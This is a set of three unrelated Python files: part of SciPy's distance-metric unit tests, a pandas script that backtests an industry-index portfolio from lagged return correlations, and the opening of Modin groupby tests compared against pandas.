assert_allclose(m2, 0.6, rtol=0, atol=1e-10)
def test_pdist_matching_mtica2(self):
# Test matching(*,*) with mtica example #2.
m = matching(np.array([1, 0, 1]),
np.array([1, 1, 0]))
m2 = matching(np.array([1, 0, 1], dtype=np.bool),
np.array([1, 1, 0], dtype=np.bool))
assert_allclose(m, 2/3, rtol=0, atol=1e-10)
assert_allclose(m2, 2/3, rtol=0, atol=1e-10)
def test_pdist_matching_match(self):
# Test pdist(X, 'matching') to see if the two implementations match on
# random boolean input data.
D = eo['random-bool-data']
B = np.bool_(D)
if verbose > 2:
print(B.shape, B.dtype)
eps = 1e-10
y1 = pdist(B, "matching")
y2 = pdist(B, "test_matching")
y3 = pdist(D, "test_matching")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y1-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_jaccard_mtica1(self):
m = jaccard(np.array([1, 0, 1, 1, 0]),
np.array([1, 1, 0, 1, 1]))
m2 = jaccard(np.array([1, 0, 1, 1, 0], dtype=np.bool),
np.array([1, 1, 0, 1, 1], dtype=np.bool))
assert_allclose(m, 0.6, rtol=0, atol=1e-10)
assert_allclose(m2, 0.6, rtol=0, atol=1e-10)
def test_pdist_jaccard_mtica2(self):
m = jaccard(np.array([1, 0, 1]),
np.array([1, 1, 0]))
m2 = jaccard(np.array([1, 0, 1], dtype=np.bool),
np.array([1, 1, 0], dtype=np.bool))
assert_allclose(m, 2/3, rtol=0, atol=1e-10)
assert_allclose(m2, 2/3, rtol=0, atol=1e-10)
def test_pdist_jaccard_match(self):
# Test pdist(X, 'jaccard') to see if the two implementations match on
# random double input data.
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "jaccard")
y2 = pdist(D, "test_jaccard")
y3 = pdist(np.bool_(D), "test_jaccard")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y2-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_yule_mtica1(self):
m = yule(np.array([1, 0, 1, 1, 0]),
np.array([1, 1, 0, 1, 1]))
m2 = yule(np.array([1, 0, 1, 1, 0], dtype=np.bool),
np.array([1, 1, 0, 1, 1], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 2, rtol=0, atol=1e-10)
assert_allclose(m2, 2, rtol=0, atol=1e-10)
def test_pdist_yule_mtica2(self):
m = yule(np.array([1, 0, 1]),
np.array([1, 1, 0]))
m2 = yule(np.array([1, 0, 1], dtype=np.bool),
np.array([1, 1, 0], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 2, rtol=0, atol=1e-10)
assert_allclose(m2, 2, rtol=0, atol=1e-10)
def test_pdist_yule_match(self):
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "yule")
y2 = pdist(D, "test_yule")
y3 = pdist(np.bool_(D), "test_yule")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y2-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_dice_mtica1(self):
m = dice(np.array([1, 0, 1, 1, 0]),
np.array([1, 1, 0, 1, 1]))
m2 = dice(np.array([1, 0, 1, 1, 0], dtype=np.bool),
np.array([1, 1, 0, 1, 1], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 3/7, rtol=0, atol=1e-10)
assert_allclose(m2, 3/7, rtol=0, atol=1e-10)
def test_pdist_dice_mtica2(self):
m = dice(np.array([1, 0, 1]),
np.array([1, 1, 0]))
m2 = dice(np.array([1, 0, 1], dtype=np.bool),
np.array([1, 1, 0], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 0.5, rtol=0, atol=1e-10)
assert_allclose(m2, 0.5, rtol=0, atol=1e-10)
def test_pdist_dice_match(self):
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "dice")
y2 = pdist(D, "test_dice")
y3 = pdist(D, "test_dice")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y2-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_sokalsneath_mtica1(self):
m = sokalsneath(np.array([1, 0, 1, 1, 0]),
np.array([1, 1, 0, 1, 1]))
m2 = sokalsneath(np.array([1, 0, 1, 1, 0], dtype=np.bool),
np.array([1, 1, 0, 1, 1], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 3/4, rtol=0, atol=1e-10)
assert_allclose(m2, 3/4, rtol=0, atol=1e-10)
def test_pdist_sokalsneath_mtica2(self):
m = sokalsneath(np.array([1, 0, 1]),
np.array([1, 1, 0]))
m2 = sokalsneath(np.array([1, 0, 1], dtype=np.bool),
np.array([1, 1, 0], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 4/5, rtol=0, atol=1e-10)
assert_allclose(m2, 4/5, rtol=0, atol=1e-10)
def test_pdist_sokalsneath_match(self):
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "sokalsneath")
y2 = pdist(D, "test_sokalsneath")
y3 = pdist(np.bool_(D), "test_sokalsneath")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y2-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_rogerstanimoto_mtica1(self):
m = rogerstanimoto(np.array([1, 0, 1, 1, 0]),
np.array([1, 1, 0, 1, 1]))
m2 = rogerstanimoto(np.array([1, 0, 1, 1, 0], dtype=np.bool),
np.array([1, 1, 0, 1, 1], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 3/4, rtol=0, atol=1e-10)
assert_allclose(m2, 3/4, rtol=0, atol=1e-10)
def test_pdist_rogerstanimoto_mtica2(self):
m = rogerstanimoto(np.array([1, 0, 1]),
np.array([1, 1, 0]))
m2 = rogerstanimoto(np.array([1, 0, 1], dtype=np.bool),
np.array([1, 1, 0], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 4/5, rtol=0, atol=1e-10)
assert_allclose(m2, 4/5, rtol=0, atol=1e-10)
def test_pdist_rogerstanimoto_match(self):
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "rogerstanimoto")
y2 = pdist(D, "test_rogerstanimoto")
y3 = pdist(np.bool_(D), "test_rogerstanimoto")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y2-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_russellrao_mtica1(self):
m = russellrao(np.array([1, 0, 1, 1, 0]),
np.array([1, 1, 0, 1, 1]))
m2 = russellrao(np.array([1, 0, 1, 1, 0], dtype=np.bool),
np.array([1, 1, 0, 1, 1], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 3/5, rtol=0, atol=1e-10)
assert_allclose(m2, 3/5, rtol=0, atol=1e-10)
def test_pdist_russellrao_mtica2(self):
m = russellrao(np.array([1, 0, 1]),
np.array([1, 1, 0]))
m2 = russellrao(np.array([1, 0, 1], dtype=np.bool),
np.array([1, 1, 0], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 2/3, rtol=0, atol=1e-10)
assert_allclose(m2, 2/3, rtol=0, atol=1e-10)
def test_pdist_russellrao_match(self):
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "russellrao")
y2 = pdist(D, "test_russellrao")
y3 = pdist(np.bool_(D), "test_russellrao")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y2-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_sokalmichener_match(self):
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "sokalmichener")
y2 = pdist(D, "test_sokalmichener")
y3 = pdist(np.bool_(D), "test_sokalmichener")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y2-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_kulsinski_match(self):
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "kulsinski")
y2 = pdist(D, "test_kulsinski")
y3 = pdist(np.bool_(D), "test_kulsinski")
_assert_within_tol(y1, y2, eps, verbose > 2)
_assert_within_tol(y2, y3, eps)
def test_pdist_canberra_match(self):
D = eo['iris']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "canberra")
y2 = pdist(D, "test_canberra")
_assert_within_tol(y1, y2, eps, verbose > 2)
def test_pdist_canberra_ticket_711(self):
# Test pdist(X, 'canberra') to see if Canberra gives the right result
# as reported on gh-1238.
eps = 1e-8
pdist_y = pdist(([3.3], [3.4]), "canberra")
right_y = 0.01492537
_assert_within_tol(pdist_y, right_y, eps, verbose > 2)
def within_tol(a, b, tol):
return np.abs(a - b).max() < tol
def _assert_within_tol(a, b, atol, verbose_=False):
if verbose_:
print(np.abs(a-b).max())
assert_allclose(a, b, rtol=0, atol=atol)
class TestSomeDistanceFunctions(TestCase):
def setUp(self):
# 1D arrays
x = np.array([1.0, 2.0, 3.0])
y = np.array([1.0, 1.0, 5.0])
# 3x1 arrays
x31 = x[:,np.newaxis]
y31 = y[:,np.newaxis]
# 1x3 arrays
x13 = x31.T
y13 = y31.T
self.cases = [(x,y), (x31, y31), (x13, y13)]
def test_minkowski(self):
for x, y in self.cases:
dist1 = minkowski(x, y, p=1)
assert_almost_equal(dist1, 3.0)
dist1p5 = minkowski(x, y, p=1.5)
assert_almost_equal(dist1p5, (1.0+2.0**1.5)**(2./3))
dist2 = minkowski(x, y, p=2)
assert_almost_equal(dist2, np.sqrt(5))
def test_wminkowski(self):
w = np.array([1.0, 2.0, 0.5])
for x, y in self.cases:
dist1 = wminkowski(x, y, p=1, w=w)
assert_almost_equal(dist1, 3.0)
dist1p5 = wminkowski(x, y, p=1.5, w=w)
assert_almost_equal(dist1p5, (2.0**1.5+1.0)**(2./3))
dist2 = wminkowski(x, y, p=2, w=w)
assert_almost_equal(dist2, np.sqrt(5))
def test_euclidean(self):
for x, y in self.cases:
dist = euclidean(x, y)
assert_almost_equal(dist, np.sqrt(5))
def test_sqeuclidean(self):
for x, y in self.cases:
dist = sqeuclidean(x, y)
assert_almost_equal(dist, 5.0)
def test_cosine(self):
for x, y in self.cases:
dist = cosine(x, y)
assert_almost_equal(dist, 1.0 - 18.0/(np.sqrt(14)*np.sqrt(27)))
def test_correlation(self):
xm = np.array([-1.0, 0, 1.0])
ym = np.array([-4.0/3, -4.0/3, 5.0-7.0/3])
for x, y in self.cases:
dist = correlation(x, y)
assert_almost_equal(dist, 1.0 - np.dot(xm, ym)/(norm(xm)*norm(ym)))
def test_mahalanobis(self):
x = np.array([1.0, 2.0, 3.0])
y = np.array([1.0, 1.0, 5.0])
vi = np.array([[2.0, 1.0, 0.0],[1.0, 2.0, 1.0], [0.0, 1.0, 2.0]])
for x, y in self.cases:
dist = mahalanobis(x, y, vi)
assert_almost_equal(dist, np.sqrt(6.0))
class TestSquareForm(TestCase):
def test_squareform_empty_matrix(self):
A = np.zeros((0,0))
rA = squareform(np.array(A, dtype='double'))
assert_equal(rA.shape, (0,))
def test_squareform_empty_vector(self):
v = np.zeros((0,))
rv = squareform(np.array(v, dtype='double'))
assert_equal(rv.shape, (1,1))
assert_equal(rv[0, 0], 0)
def test_squareform_1by1_matrix(self):
A = np.zeros((1,1))
rA = squareform(np.array(A, dtype='double'))
assert_equal(rA.shape, (0,))
def test_squareform_one_vector(self):
v = np.ones((1,)) * 8.3
rv = squareform(np.array(v, dtype='double'))
assert_equal(rv.shape, (2,2))
assert_equal(rv[0,1], 8.3)
assert_equal(rv[1,0], 8.3)
def test_squareform_one_binary_vector(self):
# Tests squareform on a 1x1 binary matrix; conversion to double was
# causing problems (see pull request 73).
v = np.ones((1,), dtype=np.bool)
rv = squareform(v)
assert_equal(rv.shape, (2,2))
assert_(rv[0,1])
def test_squareform_2by2_matrix(self):
A = np.zeros((2,2))
A[0,1] = 0.8
A[1,0] = 0.8
rA = squareform(np.array(A, dtype='double'))
assert_equal(rA.shape, (1,))
assert_equal(rA[0], 0.8)
    def test_squareform_multi_matrix(self):
        for n in xrange(2, 5):
            self.check_squareform_multi_matrix(n)
def check_squareform_multi_matrix(self, n):
X = np.random.rand(n, 4)
Y = pdist(X)
assert_equal(len(Y.shape), 1)
A = squareform(Y)
Yr = squareform(A)
s = A.shape
k = 0
if verbose >= 3:
print(A.shape, Y.shape, Yr.shape)
assert_equal(len(s), 2)
assert_equal(len(Yr.shape), 1)
assert_equal(s[0], s[1])
for i in xrange(0, s[0]):
for j in xrange(i+1, s[1]):
if i != j:
assert_equal(A[i, j], Y[k])
k += 1
else:
assert_equal(A[i, j], 0)
class TestNumObsY(TestCase):
def test_num_obs_y_multi_matrix(self):
for n in xrange(2, 10):
X = np.random.rand(n, 4)
Y = pdist(X)
assert_equal(num_obs_y(Y), n)
def test_num_obs_y_1(self):
# Tests num_obs_y(y) on a condensed distance matrix over 1
# observations. Expecting exception.
assert_raises(ValueError, self.check_y, 1)
def test_num_obs_y_2(self):
# Tests num_obs_y(y) on a condensed distance matrix over 2
# observations.
assert_(self.check_y(2))
def test_num_obs_y_3(self):
assert_(self.check_y(3))
def test_num_obs_y_4(self):
assert_(self.check_y(4))
    def test_num_obs_y_5_15(self):
for i in xrange(5, 16):
self.minit(i)
def test_num_obs_y_2_100(self):
# Tests num_obs_y(y) on 100 improper condensed distance matrices.
# Expecting exception.
a = set([])
for n in xrange(2, 16):
a.add(n*(n-1)/2)
for i in xrange(5, 105):
if i not in a:
assert_raises(ValueError, self.bad_y, i)
def minit(self, n):
assert_(self.check_y(n))
def bad_y(self, n):
y = np.random.rand(n)
return num_obs_y(y)
def check_y(self, n):
return num_obs_y(self.make_y(n)) == n
def make_y(self, n):
return np.random.rand((n * (n - 1)) // 2)
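    # A condensed distance vector over n observations has n*(n-1)/2 entries;
    # num_obs_y inverts this, recovering n = (1 + sqrt(1 + 8*len(y))) / 2,
    # which is why lengths not of that form raise ValueError above.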
class TestNumObsDM(TestCase):
def test_num_obs_dm_multi_matrix(self):
for n in xrange(1, 10):
X = np.random.rand(n, 4)
Y = pdist(X)
A = squareform(Y)
if verbose >= 3:
print(A.shape, Y.shape)
assert_equal(num_obs_dm(A), n)
    def test_num_obs_dm_0(self):
        # Tests num_obs_dm(D) on a 0x0 distance matrix.
assert_(self.check_D(0))
def test_num_obs_dm_1(self):
# Tests num_obs_dm(D) on a 1x1 distance matrix.
assert_(self.check_D(1))
def test_num_obs_dm_2(self):
assert_(self.check_D(2))
    def test_num_obs_dm_3(self):
        assert_(self.check_D(3))
def test_num_obs_dm_4(self):
assert_(self.check_D(4))
def check_D(self, n):
return num_obs_dm(self.make_D(n)) == n
def make_D(self, n):
return np.random.rand(n, n)
def is_valid_dm_throw(D):
return is_valid_dm(D, throw=True)
class TestIsValidDM(TestCase):
def test_is_valid_dm_int16_array_E(self):
# Tests is_valid_dm(*) on an int16 array. Exception expected.
D = np.zeros((5, 5), dtype='i')
assert_raises(TypeError, is_valid_dm_throw, (D))
def test_is_valid_dm_int16_array_F(self):
D = np.zeros((5, 5), dtype='i')
assert_equal(is_valid_dm(D), False)
def test_is_valid_dm_improper_shape_1D_E(self):
D = np.zeros((5,), dtype=np.double)
assert_raises(ValueError, is_valid_dm_throw, (D))
def test_is_valid_dm_improper_shape_1D_F(self):
D = np.zeros((5,), dtype=np.double)
assert_equal(is_valid_dm(D), False)
def test_is_valid_dm_improper_shape_3D_E(self):
D = np.zeros((3,3,3), dtype=np.double)
assert_raises(ValueError, is_valid_dm_throw, (D))
def test_is_valid_dm_improper_shape_3D_F(self):
D = np.zeros((3,3,3), dtype=np.double)
assert_equal(is_valid_dm(D), False)
def test_is_valid_dm_nonzero_diagonal_E(self):
y = np.random.rand(10)
D = squareform(y)
for i in xrange(0, 5):
D[i, i] = 2.0
assert_raises(ValueError, is_valid_dm_throw, (D))
def test_is_valid_dm_nonzero_diagonal_F(self):
y = np.random.rand(10)
D = squareform(y)
for i in xrange(0, 5):
D[i, i] = 2.0
assert_equal(is_valid_dm(D), False)
def test_is_valid_dm_asymmetric_E(self):
y = np.random.rand(10)
D = squareform(y)
D[1,3] = D[3,1] + 1
assert_raises(ValueError, is_valid_dm_throw, (D))
def test_is_valid_dm_asymmetric_F(self):
y = np.random.rand(10)
D = squareform(y)
D[1,3] = D[3,1] + 1
assert_equal(is_valid_dm(D), False)
def test_is_valid_dm_correct_1_by_1(self):
D = np.zeros((1,1), dtype=np.double)
assert_equal(is_valid_dm(D), True)
def test_is_valid_dm_correct_2_by_2(self):
y = np.random.rand(1)
D = squareform(y)
assert_equal(is_valid_dm(D), True)
def test_is_valid_dm_correct_3_by_3(self):
y = np.random.rand(3)
D = squareform(y)
assert_equal(is_valid_dm(D), True)
def test_is_valid_dm_correct_4_by_4(self):
y = np.random.rand(6)
D = squareform(y)
assert_equal(is_valid_dm(D), True)
def test_is_valid_dm_correct_5_by_5(self):
y = np.random.rand(10)
D = squareform(y)
assert_equal(is_valid_dm(D), True)
def is_valid_y_throw(y):
return is_valid_y(y, throw=True)
class TestIsValidY(TestCase):
# If test case name ends on "_E" then an exception is expected for the
# given input, if it ends in "_F" then False is expected for the is_valid_y
# check. Otherwise the input is expected to be valid.
def test_is_valid_y_int16_array_E(self):
y = np.zeros((10,), dtype='i')
assert_raises(TypeError, is_valid_y_throw, (y))
def test_is_valid_y_int16_array_F(self):
y = np.zeros((10,), dtype='i')
assert_equal(is_valid_y(y), False)
def test_is_valid_y_improper_shape_2D_E(self):
y = np.zeros((3,3,), dtype=np.double)
assert_raises(ValueError, is_valid_y_throw, (y))
def test_is_valid_y_improper_shape_2D_F(self):
y = np.zeros((3,3,), dtype=np.double)
assert_equal(is_valid_y(y), False)
def test_is_valid_y_improper_shape_3D_E(self):
y = np.zeros((3,3,3), dtype=np.double)
assert_raises(ValueError, is_valid_y_throw, (y))
def test_is_valid_y_improper_shape_3D_F(self):
y = np.zeros((3,3,3), dtype=np.double)
assert_equal(is_valid_y(y), False)
def test_is_valid_y_correct_2_by_2(self):
y = self.correct_n_by_n(2)
assert_equal(is_valid_y(y), True)
def test_is_valid_y_correct_3_by_3(self):
y = self.correct_n_by_n(3)
assert_equal(is_valid_y(y), True)
def test_is_valid_y_correct_4_by_4(self):
y = self.correct_n_by_n(4)
assert_equal(is_valid_y(y), True)
def test_is_valid_y_correct_5_by_5(self):
y = self.correct_n_by_n(5)
assert_equal(is_valid_y(y), True)
def test_is_valid_y_2_100(self):
a = set([])
for n in xrange(2, 16):
a.add(n*(n-1)/2)
for i in xrange(5, 105):
if i not in a:
assert_raises(ValueError, self.bad_y, i)
def bad_y(self, n):
y = np.random.rand(n)
return is_valid_y(y, throw=True)
def correct_n_by_n(self, n):
y = np.random.rand((n * (n - 1)) // 2)
return y
def test_bad_p():
# Raise ValueError if p < 1.
p = 0.5
assert_raises(ValueError, minkowski, [1, 2], [3, 4], p)
assert_raises(ValueError, wminkowski, [1, 2], [3, 4], p, [1, 1])
def test_sokalsneath_all_false():
# Regression test for ticket #876
assert_raises(ValueError, sokalsneath, [False, False, False], [False, False, False])
def test_canberra():
# Regression test for ticket #1430.
assert_equal(canberra([1,2,3], [2,4,6]), 1)
assert_equal(canberra([1,1,0,0], [1,0,1,0]), 2)
def test_braycurtis():
# Regression test for ticket #1430.
assert_almost_equal(braycurtis([1,2,3], [2,4,6]), 1./3, decimal=15)
assert_almost_equal(braycurtis([1,1,0,0], [1,0,1,0]), 0.5, decimal=15)
def test_euclideans():
# Regression test for ticket #1328.
x1 = np.array([1, 1, 1])
x2 = np.array([0, 0, 0])
# Basic test of the calculation.
assert_almost_equal(sqeuclidean(x1, x2), 3.0, decimal=14)
assert_almost_equal(euclidean(x1, x2), np.sqrt(3), decimal=14)
# Check flattening for (1, N) or (N, 1) inputs
assert_almost_equal(euclidean(x1[np.newaxis, :], x2[np.newaxis, :]),
np.sqrt(3), decimal=14)
assert_almost_equal(sqeuclidean(x1[np.newaxis, :], x2[np.newaxis, :]),
3.0, decimal=14)
assert_almost_equal(sqeuclidean(x1[:, np.newaxis], x2[:, np.newaxis]),
3.0, decimal=14)
# Distance metrics only defined for vectors (= 1-D)
x = np.arange(4).reshape(2, 2)
assert_raises(ValueError, euclidean, x, x)
assert_raises(ValueError, sqeuclidean, x, x)
# Another check, with random data.
rs = np.random.RandomState(1234567890)
x = rs.rand(10)
y = rs.rand(10)
d1 = euclidean(x, y)
d2 = sqeuclidean(x, y)
assert_almost_equal(d1**2, d2, decimal=14)
def test_hamming_unequal_length():
# Regression test for gh-4290.
x = [0, 0, 1]
y = [1, 0, 1, 0]
# Used to give an AttributeError from ndarray.mean called on bool
assert_raises(ValueError, hamming, x, y)
def test_hamming_string_array():
# https://github.com/scikit-learn/scikit-learn/issues/4014
a = np.array(['eggs', 'spam', 'spam', 'eggs', 'spam', 'spam', 'spam',
'spam', 'spam', 'spam', 'spam', 'eggs', 'eggs', 'spam',
'eggs', 'eggs', 'eggs', 'eggs', 'eggs', 'spam'],
dtype='|S4')
b = np.array(['eggs', 'spam', 'spam', 'eggs', 'eggs', 'spam', 'spam',
'spam', 'spam', 'eggs', 'spam', 'eggs', 'spam', 'eggs',
'spam', 'spam', 'eggs', 'spam', 'spam', 'eggs'],
dtype='|S4')
desired = 0.45
assert_allclose(hamming(a, b), desired)
def test_sqeuclidean_dtypes():
# Assert that sqeuclidean returns the right types of values.
# Integer types should be converted to floating for stability.
# Floating point types should be the same as the input.
x = [1, 2, 3]
y = [4, 5, 6]
for dtype in [np.int8, np.int16, np.int32, np.int64]:
d = sqeuclidean(np.asarray(x, dtype=dtype), np.asarray(y, dtype=dtype))
assert_(np.issubdtype(d.dtype, np.floating))
for dtype in [np.uint8, np.uint16, np.uint32, np.uint64]:
d1 = sqeuclidean([0], np.asarray([-1], dtype=dtype))
d2 = sqeuclidean(np.asarray([-1], dtype=dtype), [0])
assert_equal(d1, d2)
assert_equal(d1, np.float64(np.iinfo(dtype).max) ** 2)
dtypes = [np.float32, np.float64, np.complex64, np.complex128]
for dtype in ['float16', 'float128']:
# These aren't present in older numpy versions; float128 may also not
# be present on all platforms.
if hasattr(np, dtype):
dtypes.append(getattr(np, dtype))
for dtype in dtypes:
d = sqeuclidean(np.asarray(x, dtype=dtype), np.asarray(y, dtype=dtype))
assert_equal(d.dtype, dtype)
def test_sokalmichener():
# Test that sokalmichener has the same result for bool and int inputs.
p = [True, True, False]
q = [True, False, True]
x = [int(b) for b in p]
y = [int(b) for b in q]
dist1 = sokalmichener(p, q)
dist2 = sokalmichener(x, y)
# These should be exactly the same.
assert_equal(dist1, dist2)
def test__validate_vector():
x = [1, 2, 3]
y = _validate_vector(x)
assert_array_equal(y, x)
y = _validate_vector(x, dtype=np.float64)
assert_array_equal(y, x)
assert_equal(y.dtype, np.float64)
x = [1]
y = _validate_vector(x)
assert_equal(y.ndim, 1)
assert_equal(y, x)
x = 1
y = _validate_vector(x)
assert_equal(y.ndim, 1)
assert_equal(y, [x])
x = np.arange(5).reshape(1, -1, 1)
y = _validate_vector(x)
assert_equal(y.ndim, 1)
assert_array_equal(y, x[0, :, 0])
x = [[1, 2], [3, 4]]
assert_raises(ValueError, _validate_vector, x)
if __name__ == "__main__":
run_module_suite()
|
import pandas as pd
import numpy as np
import math
from functools import reduce
from scipy.stats.stats import pearsonr
from matplotlib import pyplot as plt
data_path=r'./SWI closing price.xlsx'
#columns_list=['801040.SWI','801180.SWI','801710.SWI']
data=pd.read_excel(data_path)
columns_list=list(data.columns)[1:]
data_question1=data[columns_list].copy()  # copy so the derived columns below don't trigger chained-assignment warnings
for industry in list(data_question1.head(0)):
data_question1[industry+'_Lag1'] = data_question1[industry].shift(periods=-1,axis=0)
data_question1[industry+'_rate'] = data_question1[industry]/data_question1[industry+'_Lag1']
data_question1[industry+'_lograte'] = np.log(data_question1[industry+'_rate'])
data_question1.dropna(inplace=True)
data_question1_rate=data_question1[[x+'_rate' for x in columns_list]]
out=[]
columns_list_rate=[x+'_lograte' for x in columns_list]
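# Scan every ordered pair of industry log-return series: slide two 300-day
# windows (stepping 30 days, with the first window starting strictly earlier)
# and record the offsets whose Pearson correlation falls in (0.1, 1.0).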
for pair_one in columns_list_rate:
for pair_two in columns_list_rate:
pair_one_l = list(data_question1[pair_one])
pair_two_l = list(data_question1[pair_two])
start_one = 0
for i in range(10):
start_two =0
for j in range(10):
if start_one < start_two:
sli_one = pair_one_l[start_one: start_one+300]
sli_two=pair_two_l[start_two: start_two+300]
corr = pearsonr(sli_one,sli_two)[0]
if corr >0.1 and corr <1.0:
out.append([pair_one,pair_two,start_one,start_two,corr])
start_two+=30
start_one+=30
autocorr = [item for item in out if item[0]==item[1]]
cross = [item for item in out if item[0]!=item[1]]
data_score = pd.DataFrame()
data_score[columns_list] = data_question1[[x+'_lograte' for x in columns_list]]
for field in columns_list:
data_score[field+'_score'] = 0
data_score.dropna(inplace=True)
for i in range(len(cross)):
field1 = cross[i][0][:-8]
field2 = cross[i][1][:-8]
lag1 = cross[i][2]
lag2 = cross[i][3]
coef = cross[i][4]
for t in range(1,301):
if data_score.loc[t+lag1,field1] > 0:
data_score.loc[t+lag2,field2+'_score'] += coef
elif data_score.loc[t+lag1,field1] < 0:
data_score.loc[t+lag2,field2+'_score'] -= coef
score_list=[x+'_score' for x in columns_list]
data_score_n=data_score[score_list]
def Score_rank(t,score_list,data_score_n,data_score):
    scores = np.array(data_score_n[score_list])[t]
    exp_scores = [math.exp(s) for s in scores]
    total = 1 + sum(exp_scores)
    weight = [e/total for e in exp_scores] + [1/total]
    value_rate = np.dot(np.array(data_question1_rate)[t], np.array(weight)[:-1]) + np.array(weight)[-1]
    return weight, value_rate
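# Score_rank maps the t-th row of scores to softmax-style portfolio weights:
# weight_i = exp(score_i) / (1 + sum_j exp(score_j)), with the leftover 1/total
# treated as a cash position, so the industry weights plus cash sum to 1;
# value_rate is that portfolio's one-period gross return.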
value_total=[1]
weight_total=[[0]*len(score_list)+[1]]
for t in range(len(np.array(data_score))):
    weight_t, value_t = Score_rank(t,score_list,data_score_n,data_score)
    weight_total.append(weight_t)
    value_total.append(value_t)
value_day=[1]
for i in range(1,len(value_total)):
value_day.append(reduce(lambda x,y:x*y, value_total[:i]))
plt.plot(value_day[:500])
Annual_rate=(value_day[500])**(250/500)-1
def max_withdrawal(data):
mw=((pd.DataFrame(data).cummax()-pd.DataFrame(data))/pd.DataFrame(data).cummax()).max()
return round(mw,4)
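# Worked example (made-up series): for [1.0, 1.2, 0.9, 1.1] the running maxima
# are [1.0, 1.2, 1.2, 1.2], the drawdowns are [0, 0, 0.25, 1/12], and the
# maximum withdrawal is 0.25.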
Maximum_withdrawal=max_withdrawal(value_day[:500])
from scipy import stats
data_index=pd.read_excel(r'./baseline.xlsx')
data_index=list(data_index['close'])[:500]
Beta,Alpha,R_value,P_value,Std_err=stats.linregress(data_index,value_day[:500])
print(Annual_rate,Maximum_withdrawal,Beta,Alpha,R_value,P_value,Std_err)
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pytest
import sys
import pandas
import numpy as np
import modin.pandas as pd
from modin.pandas.utils import from_pandas, to_pandas
PY2 = False
if sys.version_info.major < 3:
PY2 = True
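# The assertion helpers and the per-operation checks below are decorated with
# @pytest.fixture, apparently so pytest does not collect the test_*-named
# helpers as standalone tests; they are only invoked from the scenario
# functions (test_simple_row_groupby and friends).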
@pytest.fixture
def ray_df_equals_pandas(ray_df, pandas_df):
assert isinstance(ray_df, pd.DataFrame)
assert to_pandas(ray_df).equals(pandas_df) or (
all(ray_df.isna().all()) and all(pandas_df.isna().all())
)
@pytest.fixture
def ray_df_almost_equals_pandas(ray_df, pandas_df):
assert isinstance(ray_df, pd.DataFrame)
difference = to_pandas(ray_df) - pandas_df
diff_max = difference.max().max()
assert (
to_pandas(ray_df).equals(pandas_df)
or diff_max < 0.0001
or (all(ray_df.isna().all()) and all(pandas_df.isna().all()))
)
@pytest.fixture
def ray_series_equals_pandas(ray_df, pandas_df):
assert ray_df.equals(pandas_df)
@pytest.fixture
def ray_df_equals(ray_df1, ray_df2):
assert to_pandas(ray_df1).equals(to_pandas(ray_df2))
@pytest.fixture
def ray_groupby_equals_pandas(ray_groupby, pandas_groupby):
for g1, g2 in zip(ray_groupby, pandas_groupby):
assert g1[0] == g2[0]
ray_df_equals_pandas(g1[1], g2[1])
def test_simple_row_groupby():
pandas_df = pandas.DataFrame(
{
"col1": [0, 1, 2, 3],
"col2": [4, 5, 6, 7],
"col3": [3, 8, 12, 10],
"col4": [17, 13, 16, 15],
"col5": [-4, -5, -6, -7],
}
)
ray_df = from_pandas(pandas_df)
by = [1, 2, 1, 2]
n = 1
ray_groupby = ray_df.groupby(by=by)
pandas_groupby = pandas_df.groupby(by=by)
ray_groupby_equals_pandas(ray_groupby, pandas_groupby)
test_ngroups(ray_groupby, pandas_groupby)
test_skew(ray_groupby, pandas_groupby)
test_ffill(ray_groupby, pandas_groupby)
test_sem(ray_groupby, pandas_groupby)
test_mean(ray_groupby, pandas_groupby)
test_any(ray_groupby, pandas_groupby)
test_min(ray_groupby, pandas_groupby)
test_idxmax(ray_groupby, pandas_groupby)
test_ndim(ray_groupby, pandas_groupby)
